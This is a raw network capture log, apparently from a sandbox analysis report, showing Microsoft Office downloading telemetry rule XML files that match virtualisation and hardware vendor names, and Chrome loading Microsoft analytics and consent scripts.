                                                                                2024-10-04 09:34:01 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                ETag: "0x8DC582BB556A907"
                                                                                x-ms-request-id: be018b82-401e-0035-0c8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55kg97hfq5uqyxxaw0000000cc00000000042x2
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                61192.168.2.55545113.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:01 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:01 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 470
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                ETag: "0x8DC582BBB181F65"
                                                                                x-ms-request-id: 4da5c699-a01e-0070-198c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093401Z-15767c5fc55w69c2zvnrz0gmgw0000000cmg000000003q4t
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:01 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                62192.168.2.55545313.107.246.60443
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:01 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC470INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 502
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                ETag: "0x8DC582BB6A0D312"
                                                                                x-ms-request-id: 801e2bd2-b01e-0021-6a8c-15cab7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55qdcd62bsn50hd6s0000000c7g000000000k71
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.55545613.107.246.444436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC549OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                Host: js.monitor.azure.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: cross-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://learn.microsoft.com/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:03 UTC958INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                Content-Length: 207771
                                                                                Connection: close
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Vary: Accept-Encoding
                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                Last-Modified: Mon, 16 Sep 2024 18:20:53 GMT
                                                                                ETag: 0x8DCD67C4CF3530C
                                                                                x-ms-request-id: a84a52c5-d01e-00d3-671a-0ff173000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-ms-meta-jssdkver: 4.3.2
                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.2.min.js
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                Access-Control-Allow-Origin: *
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55kg97hfq5uqyxxaw0000000ccg000000003emf
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache-Info: L1_T2
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.55545513.107.253.454436020C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-04 09:34:03 UTC551OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                Host: wcpstatic.microsoft.com
                                                                                Connection: keep-alive
                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                sec-ch-ua-mobile: ?0
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                sec-ch-ua-platform: "Windows"
                                                                                Accept: */*
                                                                                Sec-Fetch-Site: same-site
                                                                                Sec-Fetch-Mode: no-cors
                                                                                Sec-Fetch-Dest: script
                                                                                Referer: https://learn.microsoft.com/
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Accept-Language: en-US,en;q=0.9
                                                                                2024-10-04 09:34:03 UTC712INHTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: application/javascript
                                                                                Content-Length: 52717
                                                                                Connection: close
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                Age: 1074
                                                                                Cache-Control: max-age=43200
                                                                                Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                Etag: 0x8DA85F6F74C6D08
                                                                                Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                Vary: Accept-Encoding
                                                                                X-Cache: CONFIG_NOCACHE
                                                                                x-ms-blob-type: BlockBlob
                                                                                x-ms-lease-status: unlocked
                                                                                x-ms-request-id: f1a459c7-101e-0052-643e-165c72000000
                                                                                x-ms-version: 2009-09-19
                                                                                x-azure-ref: 20241004T093403Z-1767f7688dctps2t8qk28fz8yg0000000mag000000004qh5
                                                                                Accept-Ranges: bytes
                                                                                Data Ascii: "-")[0];o=e.split("-")[0]===n}return o}(e,c)}));s&&0===s.length&&(e="en-US"),o.placeholderElement=l,r&&o.consentChangedCallbacks.registerCallback(r),o.saveCookie(),o.siteConsent=new f(!1),null==n||n(void 0,o.siteConsent),o.isInitReady=!0,this.consentChang


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                65 | 192.168.2.5 | 55458 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:03 UTC | 192 | OUT | GET /rules/rule120666v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3F48DAE"
                                                                                x-ms-request-id: 1cc309a5-e01e-0071-358c-1508e7000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55qdcd62bsn50hd6s0000000c4g000000004ydx
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                66 | 192.168.2.5 | 55459 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:03 UTC | 192 | OUT | GET /rules/rule120667v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 408
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                                ETag: "0x8DC582BB9B6040B"
                                                                                x-ms-request-id: 04c46130-501e-0064-028c-151f54000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55v7j95gq2uzq37a00000000chg000000005vwb
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC | 408 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                67 | 192.168.2.5 | 55457 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:03 UTC | 192 | OUT | GET /rules/rule120665v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 407
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                ETag: "0x8DC582B9D30478D"
                                                                                x-ms-request-id: 285c7e33-c01e-008e-718c-157381000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55rg5b7sh1vuv8t7n0000000cn0000000007s7h
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC | 407 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                68 | 192.168.2.5 | 55449 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:03 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 411
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                ETag: "0x8DC582B989AF051"
                                                                                x-ms-request-id: be018b72-401e-0035-7e8c-1582d8000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55xsgnlxyxy40f4m00000000c9g0000000033ks
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC | 411 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                69 | 192.168.2.5 | 55464 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:03 UTC | 192 | OUT | GET /rules/rule120668v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:03 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:03 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 469
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                ETag: "0x8DC582BB3CAEBB8"
                                                                                x-ms-request-id: 6a902a44-301e-005d-788c-15e448000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093403Z-15767c5fc55tsfp92w7yna557w0000000ccg000000003kxg
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:03 UTC | 469 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                70 | 192.168.2.5 | 55466 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:04 UTC | 192 | OUT | GET /rules/rule120669v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 416
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                                ETag: "0x8DC582BB5284CCE"
                                                                                x-ms-request-id: 15fe14b4-a01e-0002-638c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55rv8zjq9dg0musxg0000000ccg000000003dk4
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC | 416 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                71 | 192.168.2.5 | 55465 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:04 UTC | 192 | OUT | GET /rules/rule120670v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 472
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT
                                                                                ETag: "0x8DC582B91EAD002"
                                                                                x-ms-request-id: 4da5c882-a01e-0070-628c-15573b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55d6fcl6x6bw8cpdc0000000c9g0000000033b7
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC | 472 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                72 | 192.168.2.5 | 55467 | 13.107.246.60 | 443
                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                2024-10-04 09:34:04 UTC | 192 | OUT | GET /rules/rule120671v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                2024-10-04 09:34:04 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 432
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT
                                                                                ETag: "0x8DC582BAABA2A10"
                                                                                x-ms-request-id: 15fe1592-a01e-0002-378c-155074000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55tsfp92w7yna557w0000000c7g00000000b1vq
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                2024-10-04 09:34:04 UTC | 432 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 73 | 192.168.2.5 | 55470 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:04 UTC | 192 | OUT | GET /rules/rule120672v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:04 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 475
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                ETag: "0x8DC582BBA740822"
                                                                                x-ms-request-id: b9a19b13-401e-0078-148c-154d34000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55sdcjq8ksxt4n9mc00000001kg000000009n9r
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:04 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 74 | 192.168.2.5 | 55471 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:04 UTC | 192 | OUT | GET /rules/rule120673v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:04 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:04 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 427
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT
                                                                                ETag: "0x8DC582BB464F255"
                                                                                x-ms-request-id: 9bed6e8e-001e-0046-5b8c-15da4b000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093404Z-15767c5fc55qkvj6n60pxm9mbw00000001dg000000008kpy
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:04 UTC | 427 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 75 | 192.168.2.5 | 55473 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:05 UTC | 192 | OUT | GET /rules/rule120674v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:05 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 474
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                ETag: "0x8DC582BA4037B0D"
                                                                                x-ms-request-id: e08726cd-901e-00a0-738c-156a6d000000
                                                                                x-ms-version: 2018-03-28
                                                                                x-azure-ref: 20241004T093405Z-15767c5fc55gq5fmm10nm5qqr80000000cgg000000002sq5
                                                                                x-fd-int-roxy-purgeid: 0
                                                                                X-Cache: TCP_HIT
                                                                                Accept-Ranges: bytes
                                                                                 2024-10-04 09:34:05 UTC | 474 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                 Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                 76 | 192.168.2.5 | 55474 | 13.107.246.60 | 443
                                                                                 Timestamp | Bytes transferred | Direction | Data
                                                                                 2024-10-04 09:34:05 UTC | 192 | OUT | GET /rules/rule120675v0s19.xml HTTP/1.1
                                                                                Connection: Keep-Alive
                                                                                Accept-Encoding: gzip
                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                Host: otelrules.azureedge.net
                                                                                 2024-10-04 09:34:05 UTC | 470 | IN | HTTP/1.1 200 OK
                                                                                Date: Fri, 04 Oct 2024 09:34:05 GMT
                                                                                Content-Type: text/xml
                                                                                Content-Length: 419
                                                                                Connection: close
                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                ETag: "0x8DC582BA6CF78C8"
                                                                                x-ms-request-id: 766164d5-c01e-0082-668c-15af72000000
                                                                                x-ms-version: 2018-03-28
